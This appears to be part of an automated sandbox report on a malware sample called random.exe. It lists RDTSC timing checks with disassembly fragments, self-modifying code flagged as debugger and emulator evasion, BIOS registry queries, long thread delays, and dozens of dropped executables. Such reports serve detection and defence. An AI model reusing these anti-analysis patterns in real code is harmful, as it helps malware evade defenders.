Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53A02A1 second address: 53A02A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53A02A5 second address: 53A02BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C45470A85h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53A02BE second address: 53A02F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 push ebx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F4C44C2BE32h 0x00000011 mov dword ptr [esp], ebp 0x00000014 jmp 00007F4C44C2BE30h 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53A02F7 second address: 53A02FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53A02FB second address: 53A02FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53A02FF second address: 53A0305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53A0305 second address: 53A0362 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C44C2BE34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d jmp 00007F4C44C2BE2Eh 0x00000012 pushfd 0x00000013 jmp 00007F4C44C2BE32h 0x00000018 jmp 00007F4C44C2BE35h 0x0000001d popfd 0x0000001e popad 0x0000001f and dword ptr [eax], 00000000h 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53A0362 second address: 53A0366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53A0366 second address: 53A036C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53A036C second address: 53A03AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C45470A82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F4C45470A7Dh 0x00000013 xor cl, 00000016h 0x00000016 jmp 00007F4C45470A81h 0x0000001b popfd 0x0000001c mov bh, ch 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53A03AC second address: 53A03B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5380983 second address: 53809A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C45470A81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4C45470A7Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53809A6 second address: 53809D1 instructions: 0x00000000 rdtsc 0x00000002 mov edi, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushfd 0x00000009 jmp 00007F4C44C2BE2Ch 0x0000000e jmp 00007F4C44C2BE35h 0x00000013 popfd 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53809D1 second address: 5380A32 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4C45470A80h 0x00000008 jmp 00007F4C45470A85h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 mov ebp, esp 0x00000013 jmp 00007F4C45470A7Eh 0x00000018 mov eax, dword ptr [ebp+08h] 0x0000001b jmp 00007F4C45470A80h 0x00000020 and dword ptr [eax], 00000000h 0x00000023 pushad 0x00000024 mov di, si 0x00000027 movzx ecx, di 0x0000002a popad 0x0000002b pop ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5380A32 second address: 5380A36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5380A36 second address: 5380A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5380A3C second address: 5380A42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5340273 second address: 53402A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C45470A80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov si, 2181h 0x0000000d popad 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F4C45470A7Ch 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53402A1 second address: 53402A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53402A5 second address: 53402C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C45470A89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53402C2 second address: 5340308 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C44C2BE31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c pushad 0x0000000d jmp 00007F4C44C2BE2Ch 0x00000012 mov ebx, eax 0x00000014 popad 0x00000015 xchg eax, ecx 0x00000016 jmp 00007F4C44C2BE2Ch 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F4C44C2BE2Eh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5340411 second address: 534043E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C45470A81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4C45470A83h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 534043E second address: 5340442 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5340442 second address: 5340448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5340448 second address: 534045C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 3E84CF71h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 534045C second address: 5340460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5340460 second address: 5340464 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5340464 second address: 534046A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 534046A second address: 5340470 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5340470 second address: 53404D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C45470A88h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F4C45470A7Eh 0x00000014 add ax, BDD8h 0x00000019 jmp 00007F4C45470A7Bh 0x0000001e popfd 0x0000001f push eax 0x00000020 mov dx, 8CFAh 0x00000024 pop edx 0x00000025 popad 0x00000026 je 00007F4CB782EBD3h 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f jmp 00007F4C45470A83h 0x00000034 pushad 0x00000035 popad 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53404D7 second address: 53404DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53404DD second address: 53404E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53404E1 second address: 53405CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C44C2BE31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000012 jmp 00007F4C44C2BE2Eh 0x00000017 je 00007F4CB6FE9F44h 0x0000001d jmp 00007F4C44C2BE30h 0x00000022 mov edx, dword ptr [esi+44h] 0x00000025 jmp 00007F4C44C2BE30h 0x0000002a or edx, dword ptr [ebp+0Ch] 0x0000002d jmp 00007F4C44C2BE30h 0x00000032 test edx, 61000000h 0x00000038 pushad 0x00000039 call 00007F4C44C2BE2Eh 0x0000003e pushfd 0x0000003f jmp 00007F4C44C2BE32h 0x00000044 sub si, 11B8h 0x00000049 jmp 00007F4C44C2BE2Bh 0x0000004e popfd 0x0000004f pop esi 0x00000050 pushfd 0x00000051 jmp 00007F4C44C2BE39h 0x00000056 sbb ecx, 37533C56h 0x0000005c jmp 00007F4C44C2BE31h 0x00000061 popfd 0x00000062 popad 0x00000063 jne 00007F4CB6FE9EF8h 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007F4C44C2BE2Dh 0x00000070 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53405CB second address: 534060B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C45470A81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [esi+48h], 00000001h 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F4C45470A7Ch 0x00000014 add esi, 6A1150D8h 0x0000001a jmp 00007F4C45470A7Bh 0x0000001f popfd 0x00000020 push eax 0x00000021 push edx 0x00000022 mov ecx, 260EAA25h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 534060B second address: 5340671 instructions: 0x00000000 rdtsc 0x00000002 mov bx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 jne 00007F4CB6FE9EB4h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F4C44C2BE39h 0x00000017 and ax, 6326h 0x0000001c jmp 00007F4C44C2BE31h 0x00000021 popfd 0x00000022 pushfd 0x00000023 jmp 00007F4C44C2BE30h 0x00000028 or esi, 493F94C8h 0x0000002e jmp 00007F4C44C2BE2Bh 0x00000033 popfd 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5340671 second address: 5340677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5340677 second address: 534067B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\random.exe	Special instruction interceptor: First address: 104DCA5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\random.exe	Special instruction interceptor: First address: E72C34 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\random.exe	Special instruction interceptor: First address: 10B35D6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Special instruction interceptor: First address: FCDCA5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Special instruction interceptor: First address: DF2C34 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Special instruction interceptor: First address: 10335D6 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Memory allocated: 30F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Memory allocated: 3190000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Memory allocated: 5190000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Memory allocated: FE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Memory allocated: 2C00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Memory allocated: 1280000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Memory allocated: 1040000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Memory allocated: 2C00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Memory allocated: 4C00000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_0537048E rdtsc

0_2_0537048E

Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window / User API: threadDelayed 1018	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window / User API: threadDelayed 1020	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window / User API: threadDelayed 1167	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window / User API: threadDelayed 1519	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window / User API: threadDelayed 845	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window / User API: threadDelayed 1185	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Window / User API: threadDelayed 6821	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Window / User API: threadDelayed 2649	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Window / User API: threadDelayed 1414
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Window / User API: threadDelayed 1410
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Window / User API: threadDelayed 3169
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Window / User API: threadDelayed 560
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6558
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 712

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10141550101\HmngBpR.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10141680101\26335e66aa.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\EdgeBHO.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\CgmaT61[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10141690101\8c12a2b1f0.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\mAtJWNv[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\v6Oqdnc[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\FvbuInU[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10141540101\v6Oqdnc.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10141670101\7fd483a527.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10141580101\mAtJWNv.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10141700101\b794b2f69e.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10141720101\a2528907a0.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\HmngBpR[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10141650101\61c1a86413.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10141660101\afdbfd8fdc.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10141730101\d8be899fe4.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10141630101\V0Bt74c.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10141620101\yUI6F6C.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\zY9sqWs[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10141590101\CgmaT61.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\yUI6F6C[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\a.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10141610101\ADFoyxP.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10141740101\48726a724d.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\V0Bt74c[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\ADFoyxP[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10141530101\FvbuInU.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10141600101\zY9sqWs.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[3].exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com

API coverage: 4.0 %

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 8148	Thread sleep count: 1018 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 8148	Thread sleep time: -2037018s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 8152	Thread sleep count: 1020 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 8152	Thread sleep time: -2041020s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 8124	Thread sleep count: 316 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 8124	Thread sleep time: -9480000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 8156	Thread sleep count: 1167 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 8156	Thread sleep time: -2335167s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 8144	Thread sleep count: 1519 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 8144	Thread sleep time: -3039519s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 8164	Thread sleep count: 845 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 8164	Thread sleep time: -1690845s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 8136	Thread sleep count: 1185 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 8136	Thread sleep time: -2371185s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe TID: 704	Thread sleep time: -24903104499507879s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe TID: 5284	Thread sleep time: -59388s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe TID: 5284	Thread sleep time: -91650s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com TID: 5780	Thread sleep count: 3169 > 30
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com TID: 5780	Thread sleep time: -31690s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe TID: 3956	Thread sleep count: 560 > 30
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe TID: 5044	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe TID: 5468	Thread sleep time: -922337203685477s >= -30000s
